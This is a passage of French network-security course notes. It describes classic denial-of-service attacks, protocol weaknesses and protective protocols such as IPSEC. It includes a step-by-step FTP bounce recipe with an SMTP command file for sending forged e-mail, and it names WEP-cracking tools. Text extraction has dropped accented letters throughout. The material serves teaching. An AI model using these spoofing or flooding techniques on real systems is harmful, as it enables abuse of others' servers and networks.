Exemple de mise en uvre sur un protocole dauthentification bas sur un mcanisme de
dfi-rponse (authentification Windows NT 4.0 par exemple) :

Vu du serveur, cest le pirate qui sest correctement authentifi !

Smurf

Lattaque smurf est une attaque en dni de service bnficiant dune particularit du
protocole ICMP implment essentiellement dans les systmes UNIX : un metteur dun
paquet ICMP sur une adresse de broadcast IP (typiquement un ping sur le rseau
255.255.255.255) recevra autant de rponses quil existe de machines joignables par ce
rseau de broadcast. Ceci permet donc de dmultiplier le nombre de paquets rseaux
destination dune cible donne, le rseau jouant alors un rle damplificateur.
Il suffit alors de forger de nombreux paquets ICMP de type echo request (un simple
ping donc), sur une adresse de destination en broadcast et en falsifiant son adresse
source (ladresse source tant alors celle de la victime du smurf) pour que la victime
8

Lattaque est dite du singe rpteur de par le fait que cette attaque ne ncessite aucune
intelligence particulire pour lintercepteur, qui se contente de rpter les trames sans forcment en
interprter et en comprendre le contenu.
54

CNAM Jean-Christophe GALLARD

reoive autant de paquets ICMP de type echo-reply quil existe de machines ayant
reu les premiers types de paquet. La consquence de cette attaque est donc une
inondation de la machine vise sous un flot de paquets ICMP.

Lattaque Out Of Band

Lattaque Out Of Band (OOB), galement connue sous le nom Nuke, vise plus
particulirement les systmes Windows. Elle consiste mettre au port TCP 139 de la
machine cible un premier segment TCP hors squence contenant le drapeau URG mais
ntant pas suivi de donnes.
Sur les systmes vulnrable, lattaque provoque un plantage de la pile TCP/IP et, par
extension, celui du systme.

Le Ping Of Death

Le Ping de la mort consiste mettre une srie de fragment IP qui, aprs


rassemblage, constitue un paquet ICMP dune taille suprieure la taille maximale dun
message ICMP (65535 octets).
Les systmes vulnrables ragissent par un plantage de la pile TCP/IP et, par extension,
celui du systme.

Lattaque Snork

Lattaque snork vise les systmes Windows. Elle consiste envoyer rediriger un flux de
sortie de services UDP comme chargen (port 19) vers une connexion entrante sur le port
139 de la machine cible.
Le service chargen gnrant un flux de sortie permanent, lattaque provoque une
rduction de la bande passante et une saturation de la pile TCP/IP de la machine cible.

Le Land Attack

Le Land Attack est une attaque en dni de service consistant mettre un segment TCP
sur un port ouvert dune machine, et ayant comme caractristique principale que ladresse
source, usurpe, est celle de la cible elle-mme.

Lattaque Jolt

Cette attaque en dni de service vise tous les systmes. Elle consiste mettre
destination de la cible un trs grand nombre de paquets ICMP trs fragments.
Sur les machines Windows vulnrables (typiquement une vieille station sous Windows NT
4.0), le rsultat est assez spectaculaire puisquil mne au figeage complet du systme
tant que dure lattaque. Lors de larrt du Jolt, le systme cible reprend vie .

55

CNAM Jean-Christophe GALLARD

Lattaque Tear Drop

Lattaque Tear Drop consiste mettre des segments TCP fragments qui se recouvrent
mutuellement.
Les systmes vulnrables ragissent par un plantage de la pile TCP/IP et, par extension,
celui du systme.

Les Distributed Denial of Service (DDoS)

Les attaques DDoS sont utilises pour provoquer un dni de service sur la ou les
machines cibles, par inondation de leur pile TCP/IP.
Le principe de base, similaire une attaque Smurf, consiste utiliser des systmes
pirats, et disposant dune large bande passante, comme base dattaque principale.
Classiquement, ces systmes inondent la station cible de segments SYN (SYN Flood) ou
de paquets ICMP (ICMP Flood) dans une attaque coordonne.

56

6
8 ;
/

<
Le DNS
Le DNS (Domain Name Solver) permet de raliser la rsolution des noms Internet.
Fonctionnellement, il sagit dassocier un nom donn une adresse IP correspondante.
Son utilit est flagrante ds quil sagit de naviguer sur le Web : qui connat en effet
aujourdhui ladresse IP de son moteur de recherche favori ?
Du fait de sa grande importance, ce service demeure particulirement sensible en termes
de SSI. En outre, ce service de noms peut parfois contenir des enregistrements utiles
un agresseur pour se renseigner sur sa cible (adresses des relais de messagerie, types
de machines, etc.).
Dbut 2000, des pirates taient parvenus corrompre les tables de plusieurs serveurs
DNS racines (le DNS est un service hirarchique) afin de rediriger les requtes vers
certains sites (dont celui du FBI) sur un serveur pirate, usurpant ainsi lidentit de
nombreuses machines.
Lorsque lon met en place une interconnexion de rseaux il peut tre judicieux (et
recommand !) de mettre en place une architecture dite de split DNS . Le principe
consiste utiliser deux services DNS : dun cot un serveur DNS interne qui ne sera pas
visible de lextrieur et qui permettra de rsoudre tous les noms internes pour ses propres
clients, de lautre cot un serveur DNS externe, accessible de lextrieur, et ne contenant
que le strict ncessaire en termes denregistrements.
Enfin, lutilisation du protocole UDP comme support de transmission en fait un service
facilement leurrable .

La messagerie SMTP
La messagerie SMTP demeure LE protocole de messagerie pour lInternet.
Elle a t pendant longtemps une source quasi inpuisable de vulnrabilits, surtout pour
ce qui concerne le serveur sendmail . Ce programme serveur extrmement complet (et
surtout complexe) a donc t une cible privilgie par de nombreux attaquants, mme

57

CNAM Jean-Christophe GALLARD

aujourdhui puisquil sagit souvent dun point daccs conomique, pratique et simple
dutilisation (le protocole fonctionne en mode texte pur) au monde de lInternet.
Si la plupart des serveurs de messagerie actuels sont aujourdhui immuniss contre les
attaques les plus populaires, il demeure le principal vecteur de contamination pour les
virus et les chevaux de Troie. Dans ce cas de figure, il sagit souvent du client de
messagerie qui pose un problme en termes de scurit (interprtation des pices jointes
contenant du code ou des scripts, actions nfastes de lutilisateur pour lui-mme double
clic sur une pice jointe de type excutable).
Notons enfin que le protocole SMTP nimplmente aucun mcanisme dauthentification.

Le protocole FTP
Le protocole FTP permet le transfert de fichiers depuis un serveur vers un client, et vice
versa. Cest un protocole assez ancien et dont larchitecture interne demeure pour le
moins curieuse puisquil utilise deux ports de services TCP pour fonctionner : le port 21
est utilis pour le passage de commandes et le port 20 sert vhiculer les donnes.
Par construction le protocole FTP souffre de quelques lacunes en termes de SSI :

Il autorise la notion douverture de session anonyme ; le paramtrage par dfaut


autorise lutilisateur anonymous , avec un mot de passe quelconque (la
politesse lmentaire demandant ce que le mot de passe saisi corresponde
son adresse de messagerie), se connecter au service.

Le mot de passe des utilisateurs circule en clair sur le rseau.

Un exemple dattaque sur FTP : le FTP bounce


Le principe de cette attaque consiste raliser des actions malveillantes au travers dun
serveur FTP vulnrable ; vu de la cible, cest le serveur FTP qui mne lattaque et non la
machine de lagresseur. Dans lexemple qui va suivre, lagresseur va utiliser un serveur
FTP vulnrable pour envoyer un e-mail falsifi
Lagresseur se connecte sur le serveur FTP vulnrable (nom ftp.vuln.com) et dpose un
fichier de commande dans une arborescence de publication accessible en
Lecture/Ecriture.
Exemple de contenu du fichier :
HELO
MAIL
RCPT
DATA
Ceci
.

ftp.vuln.com
FROM : toto@ftp.vuln.com
TO : victime@cible.com
est un faux mail

Lagresseur se reconnecte alors au serveur puis lance une commande PORT. Cette
commande va permettre lagresseur dordonner au serveur douvrir le port de donnes
25 sur ladresse du serveur cible.com (on demande au serveur de raliser une ouverture
de session sur le port 25, soit le port de messagerie, sur cible.com).
Puis lagresseur saisit la commande GET fichierdpos.txt , ce qui a pour
consquence denvoyer le contenu du fichier pralablement dpos sur la connexion TCP
dfinie par la commande PORT.
Le fichier de donnes contenant des commandes SMTP valides, la victime de cette
attaque accepte alors le dpt du message.
58

CNAM Jean-Christophe GALLARD

Vu de la victime, le serveur FTP a mis un e-mail valide semblant provenir de lutilisateur


toto de ftp.vuln.com.

Les services interactifs


De nombreux protocoles rseaux permettent un accs interactif une machine distante.
Cest le cas de protocoles telnet, r-login et autres r-commandes . Ces protocoles
offrent donc la possibilit de passer des commandes qui seront excutes sur la machine
distante. Par dfaut, ces services ncessitent une authentification pralable pour excuter
les commandes, mais cette authentification est ralise en clair , cest dire que les
authentifiants couples login / mot de passe passent en clair sur le rseau.

X Window
Le service X Window est un service client/serveur utilis sous les systmes Unix pour
grer linterface graphique dune session utilisateur.
Son architecture complexe et les milliers de lignes de code qui le compose en ont fait un
service de choix pour les attaquants, en raison des nombreuses vulnrabilits dont il a fait
lobjet. En particulier, le schma authentification par dfaut de ce service laissait la porte
ouverte des attaquants pour raliser des captures dcran et de clavier de session
utilisateurs distance (problme des magic cookies et des fonctionnalits de type xhost)

Le protocole HTTP
Grande star des menaces lies lInternet, le protocole HTTP est un vecteur dattaque
privilgi pour les agresseurs, soit du fait de serveurs vulnrables, soit de lutilisation de
clients de navigation mal paramtrs ou non mis jour.
A lheure actuelle, il sagit, avec la messagerie lectronique, du protocole le plus utilis sur
lInternet.
De nombreux problmes de scurit sont apparus sur ce protocole, dautant plus quil est
utilis comme vecteur de transfert de codes mobiles (applets Java, scripting, contrles
ActiveX) entre les serveurs et les clients.

La Voix sur IP
En termes de scurit, les protocoles de VoIP restent un secteur en trs large friche. Les
solutions de voix sur IP reposent sur deux protocoles : un protocole pour la transmission
de la voix et un protocole de signalisation (dans lequel vont passer les informations de
numrotation, de services).
59

CNAM Jean-Christophe GALLARD

A lheure actuelle, on utilise principalement SIP (Session Initiation Protocol) pour la


signalisation et RTP (Real-time Transport Protocol) pour le transport de la voix. Ces
protocoles nimplmentent pas en tant que tel de mcanismes de scurit destins
protger les communications et, de fait, de nombreuses vulnrabilits demeurent
exploitables : coute, dtournement de trafic, anonymat, usurpation didentit,
brouillage
Plusieurs protocoles complmentaires, voire de remplacement, sont alors apparus, avec
notamment lquivalent chiffr du protocole RTP ; SRTP. De faon plus gnrale, afin de
palier les manques de scurit dans la technologie VoIP, les quipementiers ont
aujourdhui tendance prconiser lutilisation de tunnels IPSEC entre les serveurs.

60

"
:+

<

'%88:

Prambule
Afin de protger un rseau contre des attaques, de nombreux protocoles ont vu le jour,
chacun de ces protocoles permettant de lutter un niveau diffrent.

Ce chapitre na pas vocation a tre exhaustif, il dcrit les principaux protocoles de scurit
dans les rseaux.

PPP, L2F, PPTP et L2TP


PPP

La plupart des personnes, n'


ayant pas chez elles de ligne (cble ou Ethernet) relie
directement Internet, sont obliges d'
utiliser les lignes pour sy connecter.
Par la ligne tlphonique classique, deux ordinateurs maximum peuvent communiquer
par modem ensemble, au mme titre qu'
il n'
est pas possible d'
appeler simultanment
deux personnes par la mme ligne tlphonique. On dit alors que l'
on a une liaison point
point, c'
est--dire une liaison entre deux machines rduite sa plus simple expression:
il n'
y a pas ncessit de partager la ligne entre plusieurs machines, pas de besoin de
dfinir une mthode daccs concurrentiel au mdia etc.

61

CNAM Jean-Christophe GALLARD

Il existe principalement de nos jours deux grands protocoles point point:

SLIP: un protocole ancien, faible en contrles


PPP: le protocole le plus utilis pour les accs Internet par modem.

Le protocole Point Point (PPP) propose une mthode standard pour le transport de
datagrammes multi-protocoles sur une liaison simple point point. PPP comprend trois
composants principaux:

Une mthode pour encapsuler les datagrammes de plusieurs protocoles.


Un protocole de contrle du lien "Link Control Protocol" (LCP) destin tablir,
configurer, et tester la liaison de donnes.
Une famille de protocoles de contrle de rseau "Network Control Protocols"
(NCPs) pour l'
tablissement et la configuration de plusieurs protocoles de la
couche "rseau".

Le protocole de liaison Link Control Protocol (LCP) est utilis pour tablir la connexion
grce l'
change de paquets de configuration.
Il est important de noter que seules les options de configuration indpendantes de tout
protocole rseau sont configures par LCP. La configuration de chacun des protocoles
rseau est ralise via des protocoles Network Control Protocols (NCPs) spcifiques
durant la phase de configuration rseau.
Sur certaines liaisons il peut tre pertinent d'
imposer une authentification du
correspondant avant de permettre toute ngociation protocolaire au niveau rseau.
Par dfaut, l'
authentification n'
est pas demande. Lorsqu'
une implmentation impose que
le correspondant s'
authentifie l'
aide d'
un protocole d'
authentification particulier, alors il
doit explicitement demander l'
usage de ce protocole d'
authentification pendant la phase
d'
tablissement de la liaison.
Une fois que PPP a achev les procdures prcdentes, chaque protocole rseau (tels
qu'
IP, IPX, ou AppleTalk) doit tre configur sparment via un protocole Network Control
Protocol (NCP)
On voit ici que loffre de PPP en termes de scurit reste assez pauvre ; les protocoles de
tunneling fournissent alors des mcanismes de scurit complmentaires permettant :

lauthentification des connexions,


le transport des donnes de manire scurise (chiffrement des donnes dans le
tunnel),
le masquage dadresses du fait de lencapsulation (utilisation dun plan
dadressage non officiel) sur linfrastructure rseau de loprateur.

De plus ils permettent le transport de protocoles non-IP sur un backbone IP.

L2F

Le protocole L2F (Layer 2 Forwarding) est issu des travaux des socits Cisco et Shiva.
Il sagit dun protocole dencapsulation de PPP, supportant tout protocole transport par
PPP.
Lobjectif est de simuler une connexion PPP directe entre des machines distantes.
Lauthentification se fait comme si les machines taient directement connectes en PPP
(via PAP ou CHAP) sur un mme rseau LAN. Le serveur daccs au rseau de lISP
relaie la connexion PPP.

62

CNAM Jean-Christophe GALLARD

PPTP

Le protocole PPTP (Point To Point Tunneling Protocol) est issu des travaux de Microsoft
et 3Com.
PPTP permet aux connexions PPP d'
tre convoyes au travers d'
un rseau IP. Microsoft
a implment ses propres algorithmes et protocoles afin d'
intgrer PPTP dans ses
systmes dexploitation.
PPTP est intgr dans les logiciels Windows (95, 98 et NT), ainsi que dans les domaines
NT. Il est ncessaire de configurer un secret partag dans les deux quipements
terminaux du tunnel PPTP, il sagit du mot de passe de lutilisateur.
Les principales caractristiques des tunnels sont les suivantes:

le tunnel est initi par le client distant,


le serveur daccs laisse passer les connexions PPTP,
le tunnel est termin par un Serveur NT ou par un CES,
le chiffrement utilis est un RC4 sur 40 ou 128-bits.

L2TP

Le protocole L2TP (Layer 2 Tunneling Protocol) est un standard IETF issu dune synthse
des protocoles L2F et PPTP, rsultat de travaux dIBM. Alors que L2F permet de crer
des tunnels partir de lquipement daccs dun ISP, et que PPTP permet la cration de
tunnel partir du client distant, L2TP permet les deux modes de fonctionnement.
Les principales caractristiques des tunnels L2TP sont les suivantes:

le tunnel est dmarr par le serveur daccs de loprateur. Cest la fonction de


LAC (L2TP Access concentrator)
le tunnel est termin par un routeur. Cest la fonction de LNS (L2TP Network
server),
le chiffrement est bas sur IPSec.

Le courant porteur en ligne


La technologie des courants porteurs en ligne (CPL) permet dutiliser un
rseau lectrique existant comme support de transmission. Lavantage de
cette technologie est quelle permet de dployer un rseau local dans un
btiment, sans ajout de cbles supplmentaires.
La norme HomePlug utilise par ces technologies permet datteindre des dbits
quivalents ceux des rseaux locaux avec un dbit thorique maximal de lordre de 14
Mgabits/s. La porte maximale dun tel rseau peut atteindre plus de 300 mtres si il y a
continuit du cblage lectrique, sans transformateur, dpassant ainsi les portes des
rseaux WiFi, et ce malgr une puissance dmission plus faible. On observera que les
transformateurs de distribution (transformant la moyenne tension en basse tension)
bloquent efficacement les signaux HomePlug.
Pour atteindre de telles performances sur un rseau qui, au dpart, na pas t conu
pour cela, les concepteurs de la norme ont adopt des protocoles de redondances et des
multiples codes de correction derreur (turbo-code, codage Reed-Solomon, codage
convolutionnel). En outre, les adaptateurs modifient automatiquement leur modulation en
fonction de la qualit de la ligne. Laccs concurrent au mdium se fait suivant une
mthode dvitement de collision inspire de CSMA/CA utilise dans certains rseaux
Ethernet.
Sur les aspects scurit , les donnes sont transmises chiffres par un DES avec une
clef de 56 bits drive dun mot de passe.
63

CNAM Jean-Christophe GALLARD

Les vulnrabilits engendres par le fonctionnement du CPL sont nombreuses : parmi les
plus videntes, on citera les points suivants :

La porte sur des cbles lectriques demeure relativement importante ; le signal


ne sarrtant pas forcment au niveau du compteur lectrique, il peut
potentiellement se propager tout un immeuble voire aux btiments voisins,
Les fils lectriques ntant pas blinds, des couplages avec dautres rseaux sont
possibles lors des passages en goulottes,
Les signaux HomePlug peuvent tre intercepts par le rayonnement des cbles :
le rseau lectrique fait alors office dantenne et les signaux peuvent tre
intercepts plusieurs mtres de distance, y compris travers les murs,
Tout comme linterception, linjection de donnes dans le rseau ainsi que sa
perturbation est possible distance par ondes radiolectriques,
La mcanisme de scurit propos (simple DES avec une clef de 56 bits) noffre
pas un niveau de scurit conforme ltat de lart en la matire, et ce dautant
plus que la clef est drive dun simple mot de passe (rduisant dautant plus
lentropie de cette clef).
Enfin, chaque adaptateur est associ une clef matre diffrente, injecte par le
fabriquant, non modifiable et gnralement imprime au dos du module, et qui
donne accs au contrle total de lquipement.

Protocoles pour liaisons sans fil


Principes

En matire de scurit, les administrateurs de systmes dinformation doivent dsormais


faire face un nouveau dfi : la scurit des rseaux sans fil.
Le succs des rseaux locaux sans fil s'
explique facilement par leur facilit de
dploiement, associe des cots faibles : pas de frais de cblage, ce qui est souvent un
atout, notamment dans les immeubles anciens.
Un rseau sans fil se dploie trs rapidement, sans aucune dmarche auprs d'
un service
prcis de l'
entreprise, ce qui le rend idal pour des rseaux de tests ou des rseaux
temporaires. Les rseaux sans fil permettent galement de rpondre aux besoins de
mobilit entre les bureaux, les salles de runions et les laboratoires. Ils permettent
galement de rpondre la problmatique de grands sites o le cblage est trop
coteux ; campus, usines, etc.
Un rseau sans fil est classiquement compos de bornes ou point d'
accs (AP : Access
Points) et de clients. La borne agit comme un pont entre un rseau filaire et un rseau
sans fil, mais peut aussi tre vue comme un concentrateur sans fil, et beaucoup de
bornes sans fil possdent aussi des fonctions de routage et de scurit avec du filtrage
IP.
Le fonctionnement par dfaut est lorsque les interfaces Ethernet des clients dialoguent
avec les bornes. Ce mode s'
appelle infrastructure . Il propose une topologie multipoints. Il est possible d'
avoir un dialogue direct entre deux interfaces Ethernet sans fil,
c'
est le mode ad-hoc , en topologie point point. Il est galement possible pour une
machine munie d'
une carte Ethernet de se transformer en borne.

64

CNAM Jean-Christophe GALLARD

Cartes Ethernet sans fils


Plusieurs technologies existent pour crer un rseau sans fils (Home RF dIntel, OpenAir,
ETSI Hiperlan 2, IEEE 802.15.1 galement connue sous le nom de BlueTooth, etc.), mais
celle qui obtient aujourdhui le plus de succs demeure cependant la technologie
normalise par lIEEE : 802.11b (WiFi).

Problmatique de scurit

Les rseaux sans fil posent de nombreux problmes de scurit. Beaucoup de leurs
caractristiques ouvrent des vulnrabilits : les proprits du mdia, la libert topologique,
les caractristiques de la technologie, celles des implmentations, la fonctionnalit des
quipements et la manire de positionner les bornes dans l'
architecture des rseaux de
l'
entreprise.
Le mdia se compose d'
ondes radiolectriques : c'
est donc par construction, un support
sans protection vis--vis des signaux externes, donc sensible au brouillage et au dni de
service. Les caractristiques de propagation des ondes sont complexes, dynamiques et
difficiles prvoir, avec beaucoup de phnomnes : absorption, diffraction, rfraction,
rflexion, en fonction de l'
humidit, du verre, du bton, du dmarrage d'
un moteur, d'
un
four micro-ondes, etc. Il est donc trs difficile d'
envisager une limite absolue au rseau,
et sa frontire n'
est pas observable. Les coutes et interceptions sont donc aises : il sera
mme possible d'
insrer du trafic illgal et de s'
introduire malicieusement dans le rseau.
Les attaques contre les rseaux sans fil sont simples : un attaquant, ventuellement
positionn l'
extrieur du primtre physique de l'
entreprise comme le parking, se
connecte au rseau. Il est ainsi possible de s'
introduire dans le rseau, de pirater les
serveurs et mme d'
y ajouter un faux serveur.
Le "War Driving" ou quadrillage d'
une ville avec un ordinateur portable, une carte 802.11b
munie d'
une antenne externe et un rcepteur GPS pour la localisation est devenu un sport
la mode. De nombreux logiciels sont actuellement disponibles pour dtecter les rseaux
sans fil (Kismet, NetStumbler et WarDrive demeurent les plus connus)

Antenne directionnelle utilise en WarDriving

65

CNAM Jean-Christophe GALLARD

Solutions de scurisation des rseaux sans fils

Les bornes utilises dans les rseaux sans fils disposent gnralement de mcanismes
de scurit permettant dviter une intrusion rapide, mais trop souvent ces fonctions ne
sont pas actives par dfaut.
Pour l'
administration de la borne elle-mme, il faudra choisir des mots de passe de
qualit, en dsactivant tous les services d'
administration (Interface Web, SNMP, TFTP)
sur l'
interface sans fil, et en grant et supervisant des bornes uniquement par l'
interface
filaire. Il faudra galement configurer correctement les ventuels services
cryptographiques proposs par les technologies existantes (tailles des clefs pour
lessentiel).
La borne permet aussi un filtrage par adresse MAC (adresse Ethernet) : ainsi, seules les
cartes enregistres seront autorises utiliser le rseau. La gestion quotidienne de cette
fonctionnalit sera lourde si les clients changent souvent, notamment lorsque l'
on ne
dispose pas de logiciel de gestion centralise de toutes ses bornes, mais ceci reste une
bonne barrire. L'
adresse MAC figure cependant en clair dans toutes les trames.
Enfin il faudra mettre jour le logiciel de la borne (firmware) rgulirement car chaque
nouvelle version chez la plupart des constructeurs, apporte des fonctionnalits de scurit
supplmentaires et corrige les erreurs de la version prcdente. Certaines bornes ont
connu des failles graves, comme la diffusion de la communaut SNMP sur rception
d'
une trame forme de manire approprie sur les Compaq WL310.
Le principal mcanisme de scurit offert par la technologie 802.11b est le WEP (Wired
Equivalent Privacy). Dans ce protocole, la clef de chiffrement secrte est statique et tous
les clients doivent possder la mme clef.
Le WEP de premire gnration a fait lobjet de nombreuses attaques, aujourdhui
exploitables automatiquement par des outils spcifiquement dvelopps (WEPCrack,
AirSnort, PrismSnort, etc.). Autant dire que ce WEP de premire gnration prend leau
de toute part, mais il demeure tout de mme ncessaire de le mettre en uvre afin
dassurer une scurit de niveau minimal, qui sera ventuellement complte par dautres
mcanismes de scurit (VPN, authentification, filtrage des trames, etc.).
Plus rcemment, larrive de WPA comme mcanisme de protection des communications
WiFi a permis une meilleure scurisation de ce type de rseaux.

IPSEC
Concepts

IPSEC est un standard de lIETF qui dfinit une extension de scurit pour le protocole IP
afin de permettre la scurisation des donnes changes sur les rseaux bass sur ce
protocole. Bas sur des mcanismes cryptographiques, IPSEC sinsre dans la pile
protocolaire TCP / IP au niveau dIP. Cela signifie quil agit sur chaque paquet mis ou
reu et peut soit le laisser passer sans traitement particulier, soit le rejeter, soit lui
appliquer un mcanisme de scurisation.
Du fait de son intgration dans la pile de protocoles TCP/IP, IPSEC peut tre mis en
uvre sur tous les quipements utilisant le rseau et assurer une protection soit de bout
en bout, entre les tiers communicants, soit lien par lien, sur des segments de rseau.
IPSEC fournit trois principaux mcanismes de scurit :

Confidentialit et protection contre lanalyse du trafic


Les donnes transportes ne peuvent tre lues par un adversaire espionnant les
communications. En particulier, aucun mot de passe, aucune information
confidentielle ne circule en clair sur le rseau. Il est mme possible, dans certains
66

CNAM Jean-Christophe GALLARD

cas, de chiffrer les en-ttes des paquets IP et ainsi masquer, par exemple, les
adresses source et destination relles. On parle alors de protection contre
lanalyse du trafic.

Authenticit des donnes et contrle daccs continu.


Lauthenticit est compose de deux services, gnralement fournis
conjointement par un mme mcanisme : lauthentification de lorigine des
donnes et lintgrit. Lauthentification de lorigine des donnes garantit que les
donnes reues proviennent de lexpditeur dclar. Lintgrit garantit quelles
nont pas t modifies durant leur transfert. La garantie de lauthenticit de
chaque paquet reu permet de mettre en uvre un contrle daccs fort tout au
long dune communication, contrairement un contrle daccs simple
louverture de la connexion, qui nempche pas un adversaire de rcuprer une
communication son compte. Ce service permet en particulier de protger
laccs des ressources ou donnes prives.

Protection contre le rejeu


La protection contre le rejeu permet de dtecter une tentative dattaque consistant
envoyer de nouveau un paquet valide intercept prcdemment sur le rseau.

Prsentation Gnrale

Les services de scurit dIPSEC sont fournis au travers de deux extensions du protocole
IP appeles AH (Authentication Header) et ESP (Encapsulating Security Payload).

Authentication Header
AH est conu pour assurer lauthenticit des paquets IP sans chiffrement des
donnes. Le principe dAH est dadjoindre aux paquets IP un champ
supplmentaire permettant la rception de vrifier lauthenticit des donnes.
Un numro de squence permet de dtecter les tentatives de rejeu.

Encapsulating Security Payload


ESP a pour rle premier dassurer la confidentialit des donnes mais peut aussi
tre utilis pour assurer lauthenticit de celles-ci. Le principe dESP consiste
encapsuler dans un nouveau paquet IP le paquet dorigine mais sous une forme
chiffre. Lauthenticit des donnes peut tre obtenue par lajout dun bloc
dauthentification et la protection contre le rejeu par celui dun numro de
squence.

Ces deux services peuvent tre utiliss sparment ou conjointement afin dobtenir les
services de scurit requis. Ces services ne sont pas restreints un algorithme de
chiffrement particulier ; en thorie, nimporte quel algorithme de chiffrement peut tre
employ, sous rserve que les quipements en communication disposent dau moins un
algorithme en commun. IPSEC comporte une liste dalgorithmes proposs pour tre
utiliss avec IPsec et dont lutilisation est ngociable en ligne par le biais du protocole IKE
(CAST-128, BlowFish, RC5, DES, triple DES).
Pour garantir linteroprabilit entre les quipements, le standard IPSEC rend certains de
ces algorithmes obligatoires. Actuellement, DES-CBC et 3DES-CBC sont obligatoires
pour le chiffrement ; pour lauthentification, HMAC-MD5 et HMAC-SHA-1 doivent tre
prsents dans toute implmentation conforme dIPSEC.
Dautre part, pour chacune des extensions IPSEC, deux modes de protection existent :

Le mode transport protge uniquement le contenu du paquet IP sans toucher


len-tte ; ce mode nest utilisable que sur les quipements terminaux (postes
clients, serveurs).
67

CNAM Jean-Christophe GALLARD

Le mode tunnel permet la cration de tunnels par encapsulation de chaque


paquet IP dans un nouveau paquet. Ainsi, la protection porte sur tous les champs
des paquets IP arrivant lentre dun tunnel, y compris sur les champs des enttes (adresses source et destination par exemple). Ce mode est celui utilis par
les quipements rseau (routeurs, gardes-barrires...).

Prsentation technique

Afin dassurer la gestion des paramtres de scurit, IPSEC a recours des associations
de scurit.
Une association de scurit IPSEC est une connexion simplexe qui fournit des services
de scurit au trafic quelle transporte. On peut aussi la considrer comme une structure
de donnes servant stocker lensemble des paramtres de scurit associs une
communication.
Une association de scurit est unidirectionnelle : en consquence, protger les deux
sens dune communication ncessite la mise en place de deux associations, une dans
chaque sens et sur chaque quipement.
Selon le mode de fonctionnement choisi (transport ou tunnel), le paquet IP rsultant de
lapplication dune association de scurit IPSEC nest pas le mme.
Authentication Header
Mode transport :
Un en-tte AH est insr entre len-tte IP et les donnes du paquet.
En-tte IP

En-tte IP

Donnes

AH

Donnes

Mode tunnel :
Le paquet dorigine est encapsul dans le champ de DATA dun nouveau paquet,
possdant son propre en-tte, et auquel on adjoint un AH.
En-tte IP

Nouvel En-tte IP

AH

Donnes

En-tte IP

Donnes

Encapsulating Security Payload


Mode transport :
On conserve len-tte IP dorigine, auquel on ajoute un en-tte ESP suivi du champ de
9
DATA du paquet dorigine sous forme chiffre et dun trailer ESP , puis on complte le
9

Le trailer ESP contient ventuellement des octets de bourrage, la taille des octets de
bourrages et un pointeur sur len-tte suivant
68

CNAM Jean-Christophe GALLARD

paquet avec les donnes dauthentification (ce champ nest prsent que si loption
dauthentification a t slectionne).
En-tte IP

En-tte IP
dorigine

ESP

Donnes

Donnes

Trailer ESP

Donnes
d authentification

Chiffr
Authentifi

Mode tunnel :
On chiffre intgralement le paquet dorigine suivi dun trailer ESP, puis on insre ce
flux dans un nouveau paquet disposant de son propre en-tte, suivi dun en-tte ESP
et se terminant par des donnes dauthentification (ce champ nest prsent que si
loption dauthentification a t slectionne).
En-tte IP

Nouvelle
En-tte IP

ESP

Donnes

En-tte IP
d origine

Donnes

Trailer ESP

Donnes
d authentification

Chiffr
Authentifi

Gestion des clefs dans IPSEC

Les bases dIPSEC reposant sur des mcanismes cryptographiques, ces derniers ont
donc besoin de clefs pour fonctionner. Un des problmes fondamentaux dutilisation de la
cryptographie est celui de la gestion des clefs. Le terme gestion sapplique ici la fois
la gnration, la distribution, le stockage et la destruction des clefs.
Pour tablir une communication scurise, on procde en premier lieu une phase
dauthentification des fins de contrle daccs, puis un change de clef de session
permet lutilisation dun mcanisme de scurisation des changes.
IKE (Internet Key Exchange) est un systme dvelopp spcifiquement pour IPSEC qui
vise fournir des mcanismes dauthentification et dchange de clefs adapts
lensemble des situations qui peuvent se prsenter sur lInternet. Il est compos de
plusieurs lments : le cadre gnrique ISAKMP (Internet Security Association and Key
Management Protocol) et une partie des protocoles Oakley et SKEME. IKE est dfinit
dans la RFC 2409.
ISAKMP a pour rle la ngociation, ltablissement, la modification et la destruction des
associations de scurit et de leurs attributs. ISAKMP est dfinit dans la RFC 2408.
Pour ce qui concerne la gnration et la distribution des clefs, IPSEC peut ventuellement
sappuyer sur une PKI (Public Key Infrastructure).

69

CNAM Jean-Christophe GALLARD

IPV6
Pourquoi un nouveau protocole IP ?

Avec IPv4, lInternet a d faire face au dbut des annes 1990 un double
problme dpuisement des adresses IP et dexplosion de la taille des tables de routage.
Au dbut des annes 1990, lIETF a commenc rflchir lvolution des technologies
IP, travaux qui ont men la cration de IP version 6.
IPv6 garde ainsi ce qui a fait le succs de IPv4 tout en :

tendant la fonction de routage et dadressage


facilitant la migration des protocoles IPX et OSI vers IP
et, pour ce qui nous concerne, en comblant les lacunes de scurit du protocole
IPv4.

Caractristiques techniques

IPv6 propose un format dadressage sur 128 bits (contre 32 pour IPv4), hirarchique et
dont une partie peut ventuellement tre dduite de ladresse MAC des machines
(mcanisme dauto-configuration). On dispose de 3 types dadresses (Unicast, Multicast
et Anycast), les adresses de broadcast disparaissant dfinitivement
Lentte IP se simplifie, le nombre de champs tant rduit de moiti, en vue damliorer
les capacits de commutation des quipements de routage mais on propose des
extensions den-tte pour les options : les options Ipv6 sont dsormais places dans des
en-ttes spars (intercals entre len-tte IPv6 et len-tte de la couche transport),
autorisant ainsi une plus grande souplesse et une introduction aise de nouvelles
fonctionnalits.

On a tendance dire que IPv6 intgre les fonctionnalits IPSEC, mais la ralit est la
fois plus complexe et plus gnrale que ce rapide raccourci. De par sa construction
modulaire, IPv6 facilite la mise en uvre de nouvelles options et, donc, lajout de
nouveaux en-ttes ; IPSEC ayant t construit comme une extension IP, disposant de ses
propres en-ttes, ce protocole sintgre donc tout naturellement dans la pile IPv6 comme
une simple extension protocolaire. Notons par ailleurs que les fonctions de scurit de
IPv6 sont toutes, par construction, optionnelles.
Enfin, une des caractristiques essentielles de IPv6 reste celle lui permettant, de par son
format dadressage particulier et de son systme de routage volu, de grer la mobilit
des quipements terminaux. Ce nest donc pas un hasard si linfrastructure de
communication du futur rseau UMTS repose sur IPv6.
70

CNAM Jean-Christophe GALLARD

Lavenir ?

De par les nombreux avantages quil assure par rapport sa version prcdente, le
protocole IPv6 a t taill, et conu, pour remplacer terme et en douceur le vnrable
IPv4. Il nen demeure pas moins que ce protocole a bien du mal simposer comme
standard incontournable.
La faute en incombe essentiellement au fait que, pour linstant, les utilisateurs /
administrateurs de lInternet se satisfont des fonctionnalits actuelles de IPv4,
ventuellement compltes des mcanismes de scurisation de type IPSEC et de
